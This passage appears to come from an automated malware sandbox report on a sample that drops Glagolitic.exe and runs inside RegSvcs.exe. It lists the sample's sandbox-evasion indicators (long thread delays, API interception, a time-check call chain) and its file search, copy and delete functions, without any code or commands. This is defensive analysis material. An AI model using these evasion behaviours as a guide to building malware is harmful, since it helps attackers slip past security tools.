              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeAPI/Special instruction interceptor: Address: 3F64A24
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeAPI/Special instruction interceptor: Address: 3EDEA24
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598841Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598733Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598624Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598277Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598063Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596103Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595981Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595707Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595580Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594737Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599563Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597191Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596564Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594467Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594122Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594016Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593547Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3065Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6760Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6929Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2888Jump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-88136
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeAPI coverage: 3.5 %
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeAPI coverage: 3.8 %
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeAPI coverage: 3.5 %
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00452492
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00442886
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_004788BD
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,2_2_004339B6
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,2_2_0045CAFA
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00431A86
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,2_2_0044BD27
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0045DE8F FindFirstFileW,FindClose,2_2_0045DE8F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0044BF8B
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452492
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442886
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_004788BD
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,5_2_004339B6
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,5_2_0045CAFA
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00431A86
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD27
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0045DE8F FindFirstFileW,FindClose,5_2_0045DE8F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8B
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598841Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598733Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598624Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598277Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598063Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596103Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595981Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595707Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595580Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595344Jump to behavior
